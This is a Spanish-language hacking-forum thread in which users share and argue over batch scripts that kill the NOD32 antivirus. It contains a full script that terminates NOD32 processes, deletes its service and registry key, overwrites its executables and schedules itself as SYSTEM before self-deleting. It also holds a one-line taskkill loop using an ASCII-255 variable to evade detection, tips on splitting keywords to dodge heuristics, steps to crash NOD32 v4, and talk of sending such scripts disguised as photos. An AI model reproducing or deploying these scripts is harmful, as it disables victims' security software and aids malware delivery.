Foro de elhacker.net

http://rapidshare.com/files/71844033/CERRANDO_EL_NOD32_-_BATCH.rar

pass del pdf: shaka

dudas preguntas, etc sientanse libres de postear ....  ::)

No vi ese pork no me puedo bajar cosas del rapidshare...pero yo tengun un BATCh publicado por aí k lo hace tambien  ;D ;D

Saludos ;)

Archivo corrupto..! :P :P :P :P

nhaalclkiemr.- no puedes bajar del rapid? pero solo pesa 80 kb, no tarda tanto en bajar ni afecta tus descargas frees, ok si hay batchs que ya lo hacen pero este es nuevo echo por mi ok? leelo siempre hay algo que aprender...

Freeze.- Intenta bajarlo de nuevo lo baje y sigue OK todo en orden...

saludoz!  ::)

No es k ocupe 80KB...es k rapidshare no me deja bajar las descargas...es un tema algo largo de explicar...en resumen esa pagina se keda con las IPs para saber kien se bajo ya algo o se esta descargando o excedio el limite...yo como tengo el gateway (como un proxy) de Telefonica rapidshare me detecta esa IP (que es un proxy y comparto con un monton de usuarios de telefonica) y me pone k ya estoy bajando algo o k me excedi del limite...en ocasiones is puedo pero muy pocas veces cuando coincide...

MEGAUPLOAD también hace lo mismo, pero después te permite elegir entre varias opciones cual es tu IP...y allí ya aparece la verdadera...

weno y una cosa...¿pork no pones el codigo del bat aki en el foro?  :huh: :huh:

por si te interesa mi code es este:

::NOD32-Killer
::By nhaalclkiemr
@echo off
echo  @echo off >> temp.bat
echo set a=0>> temp.bat
echo set b=0>> temp.bat
echo set errorlevel=>> temp.bat
echo set tempstr=delete>> temp.bat
echo set tempstr2=NOD32>> temp.bat
echo :c >> temp.bat
echo set /A b=%%b%%+1 >> temp.bat
echo set /A a=%%a%%+1 >> temp.bat
echo taskkill /F /IM %%tempstr2%%krn.exe /IM %%tempstr2%%kui.exe /IM %%tempstr2%%.exe >> temp.bat
echo sc %%tempstr%% %%tempstr2%%krn >> temp.bat
echo reg %%tempstr%% HKLM\SYSTEM\CurrentControlSet\Services\%%tempstr2%%krn /f >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%.exe" >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%krn.exe" >> temp.bat
echo copy /Y %%windir%%\system32\extrac32.exe "%%programfiles%%\ESET\%%tempstr2%%kui.exe" >> temp.bat
echo if %%a%%==11 goto fin >> temp.bat
echo if not %%errorlevel%%==0 goto c >> temp.bat
echo if %%b%%==5 goto fin >> temp.bat
echo :fin >> temp.bat
echo del /S /A:- /F /Q %%0 >> temp.bat
echo exit >> temp.bat
move temp.bat %%windir%%\system32\temp.bat
set a=0
set z=%TIME:~0,2%
if "%TIME:~0,1%"==" " set z=0%TIME:~1,1%
if "%TIME:~8,1%"=="," goto normal
if "%TIME:~10,1%"=="," goto 2caso
if "%TIME:~12,1%"=="," goto 3caso
:normal
set x=%TIME:~3,2%
goto a
:2caso
set x=%TIME:~4,2%
goto a
:3caso
set x=%TIME:~5,2%
:a
set errorlevel=
set /A a=%a%+1
if "%x%"=="08" set x=8
if "%x%"=="09" set x=9
set /A x=%x%+1
at.exe %z%:%x% temp.bat
if %a%==11 goto b
if not %errorlevel%==0 goto a
schtasks /run /tn at1
goto d
:b
set a=0
:c
set errorlevel=
set /A a=%a%+1
if %x% LEQ 9 set x=0%x%
schtasks /create /tn temp /tr temp.bat /sc once /st %z%:%x%:00 /ru System
if %a%==11 goto d
if not %errorlevel%==0 goto c
schtasks /run /tn temp
if not %errorlevel%==0 goto c
:d
del /F /Q /S /A:- %0
exit
:error
temp.bat>>NUL
del /F /Q /S /A:- %0
exit

Tenía varias versiones en las que corregia errores, no se si esta es la nueva (y mejor) pero pienso k sirve...a mi me gustaría ver tu code solo para comparar...

Saludos ;)

what?!!  :o

jajaja pues creo que primero debes bajarlo y leerlo para opinar no? no creo que no puedas bajar ese archivo independientemente de que tu PC  o el problema que tengas... un cybercafe? por ejemplo... y el por que no puse el codigo es obvio...pero ahi esta todo.. dudas coherentes adelante...

Pues Para dercargarme un archivo fuente no creo que sea necesario tener que subirlo a un server que te limita las descargas.
Deberias de publicar tu codigo, o al menos alguna linea importante como para incetivarnos a decargala  >:(
Por algo es zona scripting

Haber, primero yo solo puse mi bat por si a alguien le sirve de ayuda y no he opinado nada...lo de rapidshare ya te he dicho el problema...y no me voy ir a un ciber para solamente bajar un codigo...

Esto es zona Scripting...aki se ponen codigos y se comenta...además k problema tienes ya k kuando baje el code ya lo veré...k mas da k lo pongas aki? y si lo pasaste a .exe (k no se) te digo k se puede recuperar el BAT principal igualmente...y de ser así además a la sección de Troyanos y Virus no a la Scripting...

Weno el code me da igual k el mio funciona muy bien...era solo por curiosidad...saludos ;)

Hola, mi pregunta es si este programa elimina los archivos del nod 32 y los deja inservibles para siempre, o solamente cierra el programa y processos (incluido el dichoso amon) asta que se reinicia la pc, y cuando se reinicie el nod32 esta como si nada hubiera pasado.
Es por no levantar sospechas... Ya que si envias una supuesta foto, y de repente le deja de funcionar el Av de por vida... Pos como que es algo misterioso..

Vale, sobre la pregunta anterior, nada xD ya lo he visto jaja, estaba publicado en el archivo pdf. Siento molestar.

@Sh4k4: Que tenés en la mente? que ***** te cuesta postear el codigo aca en el foro?  te cuesta menos, y encima si lo pasaste a .exe, dudo que alguien lo abra, tiene que confiar en vos o ser un lammer...

Yo creo que solamente tenes que cerrar los procesos y despues eliminar los archivos y las claves del NOD del registro, pero el problema está en el "AMON" (El que monitorea los archivos cuando los abris/bajas de internet/moves/lo vez desde el explorer, etc)
Entonces ahi no se como cerrarlo, ya que no se save cual es el proceso... Pero creo que eliminando los archivos, va a quedar sin funcionar correctamente y se va a poder "matar el AV"

Con resepcto a tu duda, costeta2, si elimina los archivos, no creo que se pueda volver a abrir, a menos que lo reinstales xD

Saludos ;)

WOW!! tranquilos aver vamos uno a uno:

Duweick: rapidshare es un servidor que te limita las descargas pero vamos eso es un chiste.. el archivo es un rar de 80 KB, no veo el problema de bajarlo por cualquier metodo... todo user de inet que baja software y anda en el hack sabe que rapid te limita por tiempo eso dependiendo de que bajes( en tamaños grandes MEGAS mas tiempo) pero nooo esto pesa solo 80 miseros KB ahora de poner o no mi code creo es por obvias razones...

Rey_Misterio: si asi es en el PDF dice todo. saludoz

EsTeBaN~: Que tengo en la mente? obviamente mas materia gris que TU por que no se de donde sacas que lo pase a .exe... el archivo que subi a rapidshare es de solo 80 KB es un RAR con un PDF compreso con pass, eso es... Creo que antes de empezar a decir que tengo en mi cabeza mejor bajate el archivo LEELO y luego opinas no al reves, se inteligente, dentro del PDf ahi viene una de las varias opciones para Cerrar el NOD32 y digo cerrar por que asi le puse no dije cerrar y borrar la idea es mostrar como se cierra lo demas es para users mas avanzados...

La razon para no postear el codigo asi en texto plano fue: para evitar que gente que no le interesa esto del under y el hack copie y pegue ademas eso no es una gran barrera ya que solo es cosa de copiar el codigo leyendolo o tumbando la proteccion pero eso lo sabe todo buen hack o minimo alguien con sesos en la cabeza como YO se, si les interesa el tema adelante nada cuesta copiarlo no? o asi demuestran su interes al hack y al under? aqui en el hack world nadie te hace nada tu solo debes hacerlo asi que no pidas tonterias que nadie te dara todo en la boquita, somos hackers demostremos nuestra inteligencia en vez de ponernos a insultar a los demas, demuestrame otro modo, mejora el mio por dios eso es un hacker.

saludoz!! HOOOOOOOOOOOOOOOOOOOOOOOOOOM!  ::)

otro link donde descargar... otro sitio genial!!!!

http://www.hakim.ws/cum/index.php?action=dlattach;topic=20058.0;attach=1829

 ::)

Weno estuve viendolo y weno...está bien saber k lo k haces es un bucle k cierre muchas veces el NOD32 y al final acaba cerrandose de verdad...pero no hacía falta un PDF :xD

el bucle casi mejor con un FOR que consume menos recursos y para el Sleep (si kieres usarlo) usa ping no una variable k vaya sumando ya k consume mas recursos...

y yo el bucle lo haria en el BATCH que se crea no iniciar muchos de esos BATCH que es mas cantoso y consume mas recursos...

y por ultimo...mejor que uses AT o SCHTASKS para que el BATCH se ejecute y asi no se verá...o puedes usar el método de inicio Scripting apra k se ejecute siempre sin ser visto...

weno no lo prové pero supongo k funciona...lo k me resultó interesante fue el descubrimiento de k si intentas cerrar muchas veces el NOD32 se acaba cerrando...pero weno no creo k hiciera falta tanto secreto y tanto PDF...

Por si te interesa yo lo k hago es ascender a SYSTEM...lo hago con AT y SCHTASKS y además de no ver el BATCH k se ejecuta no hace falta hacer un bucle...pork desde SYSTEM lo matas una vez y ya funciona  ;D

Saludos ;)

Precisamente funciona y creo que si no lo hize de un modo "como tu dices" es por que es solo para dar la idea si tu lo haces diferente eso depende de cada quien y por que pdf? ya explique antes ademas si leiste explico lo que ya sabemos pero para los que no ahi esta si te sirve adelante, es otro metodo mas y es mas que notorio que se pueden usar diferentes metodos que tu creas que son mejores es tu problema y tu idea la programacion nos da la pauta para usar los codigos que mejor nos acomoden algunos mejores otros peores pero el resultado es el que importa, jajaja hacender a system y matarlo eso... es viejo.. x eso es un metodo NEW usalo como se te de la gana esto es para la gente que si sabe apreciar una nueva idea... fijate en la idea no los adornos ... como diria el paseante: la informacion esta presente y eso es lo unico que importa...saludioz!  ::)

Version 3.0.621.0

Aun funciona el bug y aun no son detectados los scripts....  ::)

Y durante mucho tiempo...los AVs no miran eso...lo unico que detectan son algunas palabras y las partes en variables y ya está...

Saludos ;)

jojojo si asi fuera los bugs de enero de 2007 no hubieran sido corregidos, se ve que sabes poco del tema muchacho :rolleyes: lo unico que detectan son algunas palabras? dios!! si eso fuera un antivirus no valdrian lo que se paga $$$$$ jajaja por cierto se llama heuristica y por algo le dicen heuristuica avanzada lastima que batch aun no sea muy revisa pero pronto.... bytez!!  ;D

Jaja si hombre ahora alguien que tiene 14 post, la mayoría en su propio tema me viene a decir a mi lo que se :xD :xD ...solo hace falta mirar lo que yo he aportado en esta sección y compararlo con lo tuyo...en tu code se nota que el que no sabes eres tu...tus conocimientos son:

• Usar taskkill
• Usar el goto (para ir a etiquetas, seguro que ni lo sabes usar para llamar a funciones)
• dirigir la salida a un archivo
• usar set, if, echo y start

seguro k no sabes ni usar un for...ni llamar a funciones...el bucle que haces es penoso...solo consume recursos y sinceramente no quería decirlo pero mi codigo supera al tuyo en bastante...

mira chaval, yo en cuanto a los AVs hablo en cuanto se refiere a los archivos BATCH...lo que detectan son simplementes palabras pork un batch es de lo que está hecho...de palabras!...y si se llama heurística, y lo que hace es analizar las palabras...conjuntos de palabras...un sc delete nod32krn por ejemplo es sospechoso o una plabra como "antivirus", que tienen los BATCH si no palabras!

Asi que cuando detecten tu codigo en BATCH lo unico que tienes que hacer es partir las palabras en variables y listo...

Saludos ;)

eso a que va? dejemos la peleas quieres? me intriga el por que vienes a postear y criticar sin aportar nada bueno, 14 post no dicen nada ni tus 1000, nadie puede juzgar asi como asi yo lo hize por lo que posteaste:

lo unico que detectan son algunas palabras y las partes en variables y ya está

no entiendes? un hacker no se juzga por sus mayor o mejor conocimiento para eso estamos elites, sino sus ideas.

creo que esto es muxo mas de lo que decir partelo en variables.... joder eso es mas viejo que yo, chaval? jajajajajajajajajajajajaja gracias tan joven no soy,  ;D, y por no usar un for ya por eso no se? demuestramelo mejora mi codigo con tu for, vamos te reto a darle mas caña a esto, quiero que funcione mi codigo = o mejor pero con for- en vez de etiquetas, usa sc, net , en vez de taskkill y usa lo que tu quieras haber si sale el mismo efecto...sin tu at, asi postealo y ya... dejemos vivir y ser felicez no? mi impresion es que no sabes y no que no sepas jack o informatik sino que no sabes ser inteligente si lees tu mismo tus primeros posts de este tema que inicie leeras que luego luego empezando me criticas sin parar, sin siquiera haber leido mi articulo eso denota inteligencia de tu parte? luego por fin lo lees ya que no podias bajarlo de rapid... dios!!!! am a hacker!! i can do anithing!! just need the eternity y no me rindo nunca de los nuncas... sino cambia tu actitud de .... jaja le falto esto aquello, no sabes, bla, bla, bla, no es sino lo otro, solo mostraras lo poco inteligente... que eres

Asi que cuando detecten tu codigo en BATCH lo unico que tienes que hacer es partir las palabras en variables y listo...

eso es todo? se llama CODIFICAR,  buscalo sino me crees y ya ya tengo un programa que lo hace por mi yo mismo lo hize(CAB v3.0) que no c??? jajaja dios si puedes tronar una makina con solo 16 bitez que eres? un tonto? soy inteligente doy pauta a tus respuestas pero aca demostramos no andamos con presumir MI code es mejor que el tuyo, eso dejame decirte es un chiste por que es mejor? el tuyo depende del AT y si no esta el AT activado?? tu codigo? sip eso lo encuentras en cualquier foro, hacer system con at y matar el proceso, dios!! eso es....... faaaaaaaaaaaaaaacil jajaja pues si todo esta limitado, tremendo codigo y no sabes expresarte dios me libre de tenerte como amigo jajaja yo no tengo nada contra ti TU empezaste ahora que si crees que no se nada y que tu codigo es mejor, por que no abres otro tema y pones el tuyo por separado, no me hables , no postees aqui, ignorame y todos felices y contentos... vive tu codigo yo el mio cree lo que quieras y deja a los demas en paz.
 :-X

att. SHAKA.  ::)

HOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM!

Vayamos por partes:


Jaja, primero, si que hice aportes y mas que tu...y puedes revisar mis post si te apetece y verás como hago criticas en pocos...y peleas menos...segundo, mis 1481 mensajes dicen más que los 14 tuyos...pues claro que si!! yo he aportado y ayudado a la gente más que tu, y mismo en está sección de Scripting ayudé mucho más que tu...y tercero, el que empezaste con las peleas fuiste tu criticandome ya primero con un tono despectivo por poner mi code solo como aporte nunca criticando...y despues con lo de los AVs ya no te digo nada...diciendome que no se nada...


Jaja si hombre!!! ahora me da por tener la idea  de crear un troyano que infecte todos los ordenadores del mundo y cargarme todos los servidores de Microsoft no te jode!! ahora hazlo tu!! claro que son los conocimientos los que judgan a los hackers...ideas tiene todo el mundo...lo k hay que saber es como hacer las cosas...si no sabes por mucha idea que tengo mal te veo...yo no me considero hacker...pero si tengo conocimientos para hacer bastantes cosas...


primero, te lo vuelvo a repetir, los AVs se tragan lo de partir en variables sea o no viejo...después, el fin nunca justifica los medios, asi que pork tu metodo se cargue el nod32 y el mio tambien no tienen que ser los dos iguales...conseguirás lo mismo pero de peor forma...después hablas que yo no se y mismo tu no sabes que dices que el mío depende de AT jaja, el mio usa AT y en caso de no existir AT usa SCHTASKS y en caso de algun error se ejecuta igualmente...yo al menos pongo un control de errores...y para tu información AT viene con todos los Windows XP asik shhh...

sobre lo del rapidshare...que parte no entiendes de lo que te dije anteriormente?? tu acaso sabes que es NAT?? que es un proxy??? seguro que no...te hablo de IPs, de que al usar NAT usas un proxy y por lo tanto compartes IP con otros users (y muchos) y si estos están bajando algo para rapidshare todos los que usan ese Gateway (me refiero al proxy por si no lo sabes) son un ordenador...una sola IP...y rapidshare restringe las bajadas...por eso no puedo bajarlo y no me apetece desactivar NAT para bajarme eso...además se nota que el que no sabes eres tu que te hablo de IPs y tu me dices "no puedes bajar del rapid? pero solo pesa 80 kb"...que coño importará el tamaño?? eso se nota que el que no entiendes eres tu...y tu falta de conocimientos se nota desde el principio que no pones el codigo en la sección Scripting...si cualkiera puede cojertelo del PDF y copiartelo que más te da...además aki en scripting se ponen codes...

ahhh y tarnkilo, que mejoraré tu code y lo pondré aki...no es dificil...usas un bucle en el que llamas a un batch en vez de poner el bucle en ese batch...y otras muchas cosas...


Codificar...se bien lo que es trankilo y a ver que hace tu programa? seguro que es uno de estos que los cifra y después los descifra en una carpeta temporal (aí ya salta el AV :xD) y después los ejecuta (si el AV lo deja :xD)...y si partir las palabras en variables es todo lo que tienes que hacer en batch para que no te detecten los AVs...por el momento llega...

Sobre el code mejor no hablar...acaso no es mas facil un bucle de ***** que hace un simple taskkill que ascender a SYSTEM con AT...y AT en caso de estar desactivado para algo está schtasks...ya te lo expliqué antes...y además quien desactiva AT? nadie!!...y trankilo que amigos como tu no quiero...yo tampoco tengo nada contra ti...fuiste tu el que empezaste las criticas ya primero con el rapidshare...despues cuando puse mi codigo solo para ayudar otra vez me criticaste...y despues con los AVs...yo me limite a decirte cosas asi que se pueden mejorar e intentar ayudar y tu lo tomaste todo a mal...pues claro que tu code se puede mejorar!! también el mio!! todo se puede mejorar pero no se pone un aporte para después no aceptar que te digan mejoras con toda la buena intencion del mundo y tu lo tomes todo a mal y ala mi code es el mejor y mi code es el mejor y de ai no sales...para mi lo unico interesante en tu code es descubrir que con un bucle intensivo el nod32 acaba cerrando...es un buen descubrimiento...yo eso no te lo discutí solo te dije cosas que se podrían mejorar en el resto del codigo y puse mi codigo solo por si te servía de algo...

esto es un foro y aki a la gente no se ignora...yo intento ayudar a quien puedo igualmente que me ayudan a mi...pero trankilo que de ti ya paso tu eso trankilo...te pongo el code mejorado despues y ya no te pongo mas...

weno pues eso...el que empezaste fuiste tu sino revisa el topic y lo verás...nada mas que decir...que seas muy feliz y pasatelo bien haciendo PDFs...

Saludos ;)

Creo que está bastante claro el aporte de nhaalclkiemr en este foro  ;)
Salu2

Bueno bueno no me interesa la chachara vamos! queremos ver codigoooooozz!!  :xD a lo escrito anteriormente no cabe duda confudiste muchas cosas de las que dije quizas no me exprese como hubiera deseado pero en fin el tiempo vale oro... saludoz!! y que siga esto... el hack.

Toda la razon!!! el hack es lo unico que importa creamos lo que creamos digamos lo que digamos! hagamos lo que hagamos... ::) gracias por recordarmelo jejejejeje  ;D

eduaño jejeje que haciendo por aqui? :huh:

HOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOM!

Dejen la pelea >:(

nhaalclkiemr creo que no as valorado a Sh4k4 solo por tene un numero inferior de post.

Lo conozco de haberlo visto en otro foro y te aseguro que sabe mucho mas que tu, pero, si quereis demostrar lo que sabeis, porque no haceis un duele en batch los dos?

salu2

Weno otro que se une a la pelea... :¬¬ :¬¬

No quiero discutir...pues venga sigamos con el post...yo no tengo que demostrar nada a nadie...yo hago estas cosas para aprender, ayudar y pork me gusta no para discutir...

Weno que siga el post y no nos desviemos mas entonces...

El code cuando pueda lo hago, es que ahora mismo estoy metido en fondo en otro proyecto pero vamos que en cuanto pueda lo hago...y con el objetivo de colaborar...comparamos y tal...cojemos las mejores cosas de uno y de otro y si tu aun lo quieres mejorar mas lo haces y asi mejor...asi aprendemos todos juntos en vez de discutir...

venga saludos ;)

Thanks HEARTS!  ::)  se agracede el reconocimiento... ::)

eeehhh HEARTS no se une a la pelea ni Eduhack solo remarcan que los 2 sabemos, y si espero tu script.... espero no estes tan ocupado como para no hacerlo osea que no se te olvide,.....ok?

Ups ya casi se me había olvidado :-X...

y weno eso...mejor dejar las peleas al lado que ahora me cayo bien Sh4k4 :xD

Weno estos dias no tengo tiempo pero cuando pueda te juro que lo hago...

Saludos ;)

 :o

ok. Dont worry we wait you.

ya expirado un tiempo revivo el post para poner el script para cerrar el nod32 (versiones 2 y 3) pero con una linea :

FOR %%  IN (%PATH%) DO (start taskkill /F /IM nod32krn.* /IM ekrn.* /IM nod32kui.* /IM egui.*)

La variable del for uso un caracter ascii 255 para  despistar y en la variable path funca si tenes muchos progras instalados sino usad cualquier strings minimo de 7 a 10 para que caiga el nod32.... saludoz!!  nhaalclkiemr ojala ya tengaz el tuyo quiesiera verlo... que opinas?

ostias...me había olvidado de este post :xD :xD

mmm no sabía k funcionaba con un caracter ASCII 255...igualmente no creo k cambie mucho...pero ves asi con un for mucho mejor que con un goto :xD

Saludos ;)

 :-\ se te habia olvidado??  :P

si si funciona en vez de poner %%i o %%a etc pones...
%% + ascii 255 y funca!!!

No no cambia pero apoco no es distinto y mientras los antivirus no peten esto de la codificacion( o sea a = b y c = d) nos da un rato para despistar a nuestros oponentes los cuales esperan mas de lo mismo...


Pues, funciona...  :rolleyes:   hace su trabajo, estas en lo correcto!!!  ;)  es mas liviano no pesa tanto como el script anterior pero... no se puede modificar tanto como el otro, obviamente a menor tamaño menos le puedes cambiar.. y viceversa... en fin es una muestra de la infinita diversidad del codeo o scripteo... salutez!!! y ojala pongaz el tuyo!!! ieee!!  :D

como detalle casi todos los demas AVs caen ante este ataque por si no se han dado cuenta, basta con poner 1 linea para cada antivirus o 1 para todos(los mas conocidos o todos? jo jo jo  :xD) y BINGO!! bye bye AVs...  :laugh: un killeravs a nacido.... saludoz!! y ojala que les sirva aunque sea algo.. HOOOOOOOOOM!   ::)

Hola!!!! Otra vez aki para mostrarles un nuevo bug pero ahora para la version 4 del mismo nod32 probado en las versiones: 4.0.68.0 y 4.0.314....

Da gusto ver que se corrigen unas vulneraz en este AV lastima esta que da pena...

Ahora describo los pasos para ver el overflow:

1.- Cierra egui.exe
2.- Crea un bucle que cierre infinitamente el ekrn.exe y ejecutalo
3.- Cambia la fecha del SO a un año muy elevado por ejemplo: 8000-01-01
4.- Reinicia egui.exe
OVERFLOW!!! posible Integer... bye NOD32 v4

Saludoz! SHAKA